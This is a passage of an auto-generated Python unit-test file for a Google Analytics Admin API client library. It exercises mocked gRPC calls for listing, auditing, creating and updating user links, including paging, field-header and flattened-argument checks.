call.return_value = analytics_admin.ListUserLinksResponse() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.ListUserLinksResponse() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.list_user_links(parent="parent_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" @pytest.mark.asyncio async def test_list_user_links_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.list_user_links( analytics_admin.ListUserLinksRequest(), parent="parent_value", ) def test_list_user_links_pager(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.list_user_links), "__call__") as call: # Set the response to a series of pages. 
call.side_effect = ( analytics_admin.ListUserLinksResponse( user_links=[ resources.UserLink(), resources.UserLink(), resources.UserLink(), ], next_page_token="abc", ), analytics_admin.ListUserLinksResponse( user_links=[], next_page_token="def", ), analytics_admin.ListUserLinksResponse( user_links=[resources.UserLink(),], next_page_token="ghi", ), analytics_admin.ListUserLinksResponse( user_links=[resources.UserLink(), resources.UserLink(),], ), RuntimeError, ) metadata = () metadata = tuple(metadata) + ( gapic_v1.routing_header.to_grpc_metadata((("parent", ""),)), ) pager = client.list_user_links(request={}) assert pager._metadata == metadata results = [i for i in pager] assert len(results) == 6 assert all(isinstance(i, resources.UserLink) for i in results) def test_list_user_links_pages(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.list_user_links), "__call__") as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.ListUserLinksResponse( user_links=[ resources.UserLink(), resources.UserLink(), resources.UserLink(), ], next_page_token="abc", ), analytics_admin.ListUserLinksResponse( user_links=[], next_page_token="def", ), analytics_admin.ListUserLinksResponse( user_links=[resources.UserLink(),], next_page_token="ghi", ), analytics_admin.ListUserLinksResponse( user_links=[resources.UserLink(), resources.UserLink(),], ), RuntimeError, ) pages = list(client.list_user_links(request={}).pages) for page_, token in zip(pages, ["abc", "def", "ghi", ""]): assert page_.raw_page.next_page_token == token @pytest.mark.asyncio async def test_list_user_links_async_pager(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. 
with mock.patch.object( type(client.transport.list_user_links), "__call__", new_callable=mock.AsyncMock ) as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.ListUserLinksResponse( user_links=[ resources.UserLink(), resources.UserLink(), resources.UserLink(), ], next_page_token="abc", ), analytics_admin.ListUserLinksResponse( user_links=[], next_page_token="def", ), analytics_admin.ListUserLinksResponse( user_links=[resources.UserLink(),], next_page_token="ghi", ), analytics_admin.ListUserLinksResponse( user_links=[resources.UserLink(), resources.UserLink(),], ), RuntimeError, ) async_pager = await client.list_user_links(request={},) assert async_pager.next_page_token == "abc" responses = [] async for response in async_pager: responses.append(response) assert len(responses) == 6 assert all(isinstance(i, resources.UserLink) for i in responses) @pytest.mark.asyncio async def test_list_user_links_async_pages(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_user_links), "__call__", new_callable=mock.AsyncMock ) as call: # Set the response to a series of pages. 
call.side_effect = ( analytics_admin.ListUserLinksResponse( user_links=[ resources.UserLink(), resources.UserLink(), resources.UserLink(), ], next_page_token="abc", ), analytics_admin.ListUserLinksResponse( user_links=[], next_page_token="def", ), analytics_admin.ListUserLinksResponse( user_links=[resources.UserLink(),], next_page_token="ghi", ), analytics_admin.ListUserLinksResponse( user_links=[resources.UserLink(), resources.UserLink(),], ), RuntimeError, ) pages = [] async for page_ in (await client.list_user_links(request={})).pages: pages.append(page_) for page_, token in zip(pages, ["abc", "def", "ghi", ""]): assert page_.raw_page.next_page_token == token def test_audit_user_links( transport: str = "grpc", request_type=analytics_admin.AuditUserLinksRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.audit_user_links), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = analytics_admin.AuditUserLinksResponse( next_page_token="next_page_token_value", ) response = client.audit_user_links(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.AuditUserLinksRequest() # Establish that the response is the type that we expect. assert isinstance(response, pagers.AuditUserLinksPager) assert response.next_page_token == "next_page_token_value" def test_audit_user_links_from_dict(): test_audit_user_links(request_type=dict) def test_audit_user_links_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. 
request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.audit_user_links), "__call__") as call: client.audit_user_links() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.AuditUserLinksRequest() @pytest.mark.asyncio async def test_audit_user_links_async( transport: str = "grpc_asyncio", request_type=analytics_admin.AuditUserLinksRequest ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.audit_user_links), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.AuditUserLinksResponse( next_page_token="next_page_token_value", ) ) response = await client.audit_user_links(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.AuditUserLinksRequest() # Establish that the response is the type that we expect. assert isinstance(response, pagers.AuditUserLinksAsyncPager) assert response.next_page_token == "next_page_token_value" @pytest.mark.asyncio async def test_audit_user_links_async_from_dict(): await test_audit_user_links_async(request_type=dict) def test_audit_user_links_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. 
Set these to a non-empty value. request = analytics_admin.AuditUserLinksRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.audit_user_links), "__call__") as call: call.return_value = analytics_admin.AuditUserLinksResponse() client.audit_user_links(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] @pytest.mark.asyncio async def test_audit_user_links_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.AuditUserLinksRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.audit_user_links), "__call__") as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.AuditUserLinksResponse() ) await client.audit_user_links(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] def test_audit_user_links_pager(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.audit_user_links), "__call__") as call: # Set the response to a series of pages. 
call.side_effect = ( analytics_admin.AuditUserLinksResponse( user_links=[ resources.AuditUserLink(), resources.AuditUserLink(), resources.AuditUserLink(), ], next_page_token="abc", ), analytics_admin.AuditUserLinksResponse( user_links=[], next_page_token="def", ), analytics_admin.AuditUserLinksResponse( user_links=[resources.AuditUserLink(),], next_page_token="ghi", ), analytics_admin.AuditUserLinksResponse( user_links=[resources.AuditUserLink(), resources.AuditUserLink(),], ), RuntimeError, ) metadata = () metadata = tuple(metadata) + ( gapic_v1.routing_header.to_grpc_metadata((("parent", ""),)), ) pager = client.audit_user_links(request={}) assert pager._metadata == metadata results = [i for i in pager] assert len(results) == 6 assert all(isinstance(i, resources.AuditUserLink) for i in results) def test_audit_user_links_pages(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.audit_user_links), "__call__") as call: # Set the response to a series of pages. 
call.side_effect = ( analytics_admin.AuditUserLinksResponse( user_links=[ resources.AuditUserLink(), resources.AuditUserLink(), resources.AuditUserLink(), ], next_page_token="abc", ), analytics_admin.AuditUserLinksResponse( user_links=[], next_page_token="def", ), analytics_admin.AuditUserLinksResponse( user_links=[resources.AuditUserLink(),], next_page_token="ghi", ), analytics_admin.AuditUserLinksResponse( user_links=[resources.AuditUserLink(), resources.AuditUserLink(),], ), RuntimeError, ) pages = list(client.audit_user_links(request={}).pages) for page_, token in zip(pages, ["abc", "def", "ghi", ""]): assert page_.raw_page.next_page_token == token @pytest.mark.asyncio async def test_audit_user_links_async_pager(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.audit_user_links), "__call__", new_callable=mock.AsyncMock ) as call: # Set the response to a series of pages. 
call.side_effect = ( analytics_admin.AuditUserLinksResponse( user_links=[ resources.AuditUserLink(), resources.AuditUserLink(), resources.AuditUserLink(), ], next_page_token="abc", ), analytics_admin.AuditUserLinksResponse( user_links=[], next_page_token="def", ), analytics_admin.AuditUserLinksResponse( user_links=[resources.AuditUserLink(),], next_page_token="ghi", ), analytics_admin.AuditUserLinksResponse( user_links=[resources.AuditUserLink(), resources.AuditUserLink(),], ), RuntimeError, ) async_pager = await client.audit_user_links(request={},) assert async_pager.next_page_token == "abc" responses = [] async for response in async_pager: responses.append(response) assert len(responses) == 6 assert all(isinstance(i, resources.AuditUserLink) for i in responses) @pytest.mark.asyncio async def test_audit_user_links_async_pages(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.audit_user_links), "__call__", new_callable=mock.AsyncMock ) as call: # Set the response to a series of pages. 
call.side_effect = ( analytics_admin.AuditUserLinksResponse( user_links=[ resources.AuditUserLink(), resources.AuditUserLink(), resources.AuditUserLink(), ], next_page_token="abc", ), analytics_admin.AuditUserLinksResponse( user_links=[], next_page_token="def", ), analytics_admin.AuditUserLinksResponse( user_links=[resources.AuditUserLink(),], next_page_token="ghi", ), analytics_admin.AuditUserLinksResponse( user_links=[resources.AuditUserLink(), resources.AuditUserLink(),], ), RuntimeError, ) pages = [] async for page_ in (await client.audit_user_links(request={})).pages: pages.append(page_) for page_, token in zip(pages, ["abc", "def", "ghi", ""]): assert page_.raw_page.next_page_token == token def test_create_user_link( transport: str = "grpc", request_type=analytics_admin.CreateUserLinkRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.create_user_link), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = resources.UserLink( name="name_value", email_address="email_address_value", direct_roles=["direct_roles_value"], ) response = client.create_user_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.CreateUserLinkRequest() # Establish that the response is the type that we expect. 
    assert isinstance(response, resources.UserLink)
    assert response.name == "name_value"
    assert response.email_address == "email_address_value"
    assert response.direct_roles == ["direct_roles_value"]


def test_create_user_link_from_dict():
    test_create_user_link(request_type=dict)


def test_create_user_link_empty_call():
    # This test is a coverage failsafe to make sure that totally empty calls,
    # i.e. request == None and no flattened fields passed, work.
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.create_user_link), "__call__") as call:
        client.create_user_link()
        call.assert_called()
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.CreateUserLinkRequest()


@pytest.mark.asyncio
async def test_create_user_link_async(
    transport: str = "grpc_asyncio", request_type=analytics_admin.CreateUserLinkRequest
):
    """Async CreateUserLink: the awaited stub call receives the request verbatim."""
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.create_user_link), "__call__") as call:
        # Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            resources.UserLink(
                name="name_value",
                email_address="email_address_value",
                direct_roles=["direct_roles_value"],
            )
        )
        response = await client.create_user_link(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.CreateUserLinkRequest()

    # Establish that the response is the type that we expect.
    assert isinstance(response, resources.UserLink)
    assert response.name == "name_value"
    assert response.email_address == "email_address_value"
    assert response.direct_roles == ["direct_roles_value"]


@pytest.mark.asyncio
async def test_create_user_link_async_from_dict():
    await test_create_user_link_async(request_type=dict)


def test_create_user_link_field_headers():
    """The routing header must echo the request's parent field."""
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.CreateUserLinkRequest()
    request.parent = "parent/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.create_user_link), "__call__") as call:
        call.return_value = resources.UserLink()
        client.create_user_link(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]


@pytest.mark.asyncio
async def test_create_user_link_field_headers_async():
    """Async variant of the routing-header check."""
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.CreateUserLinkRequest()
    request.parent = "parent/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.create_user_link), "__call__") as call:
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(resources.UserLink())
        await client.create_user_link(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]


def test_create_user_link_flattened():
    """Flattened keyword arguments populate the request object's fields."""
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.create_user_link), "__call__") as call:
        # Designate an appropriate return value for the call.
        call.return_value = resources.UserLink()
        # Call the method with a truthy value for each flattened field,
        # using the keyword arguments to the method.
        client.create_user_link(
            parent="parent_value", user_link=resources.UserLink(name="name_value"),
        )

        # Establish that the underlying call was made with the expected
        # request object values.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0].parent == "parent_value"
        assert args[0].user_link == resources.UserLink(name="name_value")


def test_create_user_link_flattened_error():
    """Passing a request object together with flattened fields must raise."""
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Attempting to call a method with both a request object and flattened
    # fields is an error.
    with pytest.raises(ValueError):
        client.create_user_link(
            analytics_admin.CreateUserLinkRequest(),
            parent="parent_value",
            user_link=resources.UserLink(name="name_value"),
        )


@pytest.mark.asyncio
async def test_create_user_link_flattened_async():
    """Async variant of the flattened-argument check."""
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.create_user_link), "__call__") as call:
        # Designate an appropriate return value for the call.
call.return_value = resources.UserLink() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(resources.UserLink()) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.create_user_link( parent="parent_value", user_link=resources.UserLink(name="name_value"), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" assert args[0].user_link == resources.UserLink(name="name_value") @pytest.mark.asyncio async def test_create_user_link_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.create_user_link( analytics_admin.CreateUserLinkRequest(), parent="parent_value", user_link=resources.UserLink(name="name_value"), ) def test_batch_create_user_links( transport: str = "grpc", request_type=analytics_admin.BatchCreateUserLinksRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.batch_create_user_links), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = analytics_admin.BatchCreateUserLinksResponse() response = client.batch_create_user_links(request) # Establish that the underlying gRPC stub method was called. 
assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.BatchCreateUserLinksRequest() # Establish that the response is the type that we expect. assert isinstance(response, analytics_admin.BatchCreateUserLinksResponse) def test_batch_create_user_links_from_dict(): test_batch_create_user_links(request_type=dict) def test_batch_create_user_links_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.batch_create_user_links), "__call__" ) as call: client.batch_create_user_links() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.BatchCreateUserLinksRequest() @pytest.mark.asyncio async def test_batch_create_user_links_async( transport: str = "grpc_asyncio", request_type=analytics_admin.BatchCreateUserLinksRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.batch_create_user_links), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.BatchCreateUserLinksResponse() ) response = await client.batch_create_user_links(request) # Establish that the underlying gRPC stub method was called. 
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.BatchCreateUserLinksRequest()

    # Establish that the response is the type that we expect.
    assert isinstance(response, analytics_admin.BatchCreateUserLinksResponse)


@pytest.mark.asyncio
async def test_batch_create_user_links_async_from_dict():
    await test_batch_create_user_links_async(request_type=dict)


def test_batch_create_user_links_field_headers():
    """The request's `parent` must be echoed as an x-goog-request-params header."""
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.BatchCreateUserLinksRequest()

    request.parent = "parent/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.batch_create_user_links), "__call__"
    ) as call:
        call.return_value = analytics_admin.BatchCreateUserLinksResponse()
        client.batch_create_user_links(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]


@pytest.mark.asyncio
async def test_batch_create_user_links_field_headers_async():
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.BatchCreateUserLinksRequest()

    request.parent = "parent/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.batch_create_user_links), "__call__"
    ) as call:
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            analytics_admin.BatchCreateUserLinksResponse()
        )
        await client.batch_create_user_links(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]


def test_update_user_link(
    transport: str = "grpc", request_type=analytics_admin.UpdateUserLinkRequest
):
    """update_user_link forwards the request and surfaces the mocked UserLink."""
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.update_user_link), "__call__") as call:
        # Designate an appropriate return value for the call.
        call.return_value = resources.UserLink(
            name="name_value",
            email_address="email_address_value",
            direct_roles=["direct_roles_value"],
        )
        response = client.update_user_link(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.UpdateUserLinkRequest()

    # Establish that the response is the type that we expect.
    assert isinstance(response, resources.UserLink)
    assert response.name == "name_value"
    assert response.email_address == "email_address_value"
    assert response.direct_roles == ["direct_roles_value"]


def test_update_user_link_from_dict():
    test_update_user_link(request_type=dict)


def test_update_user_link_empty_call():
    # This test is a coverage failsafe to make sure that totally empty calls,
    # i.e. request == None and no flattened fields passed, work.
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.update_user_link), "__call__") as call:
        client.update_user_link()
        call.assert_called()
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.UpdateUserLinkRequest()


@pytest.mark.asyncio
async def test_update_user_link_async(
    transport: str = "grpc_asyncio", request_type=analytics_admin.UpdateUserLinkRequest
):
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.update_user_link), "__call__") as call:
        # Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            resources.UserLink(
                name="name_value",
                email_address="email_address_value",
                direct_roles=["direct_roles_value"],
            )
        )
        response = await client.update_user_link(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.UpdateUserLinkRequest()

    # Establish that the response is the type that we expect.
    assert isinstance(response, resources.UserLink)
    assert response.name == "name_value"
    assert response.email_address == "email_address_value"
    assert response.direct_roles == ["direct_roles_value"]


@pytest.mark.asyncio
async def test_update_user_link_async_from_dict():
    await test_update_user_link_async(request_type=dict)


def test_update_user_link_field_headers():
    """`user_link.name` must be echoed as an x-goog-request-params header."""
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.UpdateUserLinkRequest()

    request.user_link.name = "user_link.name/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.update_user_link), "__call__") as call:
        call.return_value = resources.UserLink()
        client.update_user_link(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "user_link.name=user_link.name/value",) in kw[
        "metadata"
    ]


@pytest.mark.asyncio
async def test_update_user_link_field_headers_async():
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.UpdateUserLinkRequest()

    request.user_link.name = "user_link.name/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.update_user_link), "__call__") as call:
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(resources.UserLink())
        await client.update_user_link(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "user_link.name=user_link.name/value",) in kw[
        "metadata"
    ]


def test_update_user_link_flattened():
    """Flattened keyword arguments are folded into the request object."""
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.update_user_link), "__call__") as call:
        # Designate an appropriate return value for the call.
        call.return_value = resources.UserLink()
        # Call the method with a truthy value for each flattened field,
        # using the keyword arguments to the method.
        client.update_user_link(user_link=resources.UserLink(name="name_value"),)

        # Establish that the underlying call was made with the expected
        # request object values.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0].user_link == resources.UserLink(name="name_value")


def test_update_user_link_flattened_error():
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Attempting to call a method with both a request object and flattened
    # fields is an error.
    with pytest.raises(ValueError):
        client.update_user_link(
            analytics_admin.UpdateUserLinkRequest(),
            user_link=resources.UserLink(name="name_value"),
        )


@pytest.mark.asyncio
async def test_update_user_link_flattened_async():
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.update_user_link), "__call__") as call:
        # Designate an appropriate return value for the call.
call.return_value = resources.UserLink() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(resources.UserLink()) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.update_user_link( user_link=resources.UserLink(name="name_value"), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].user_link == resources.UserLink(name="name_value") @pytest.mark.asyncio async def test_update_user_link_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.update_user_link( analytics_admin.UpdateUserLinkRequest(), user_link=resources.UserLink(name="name_value"), ) def test_batch_update_user_links( transport: str = "grpc", request_type=analytics_admin.BatchUpdateUserLinksRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.batch_update_user_links), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = analytics_admin.BatchUpdateUserLinksResponse() response = client.batch_update_user_links(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.BatchUpdateUserLinksRequest() # Establish that the response is the type that we expect. 
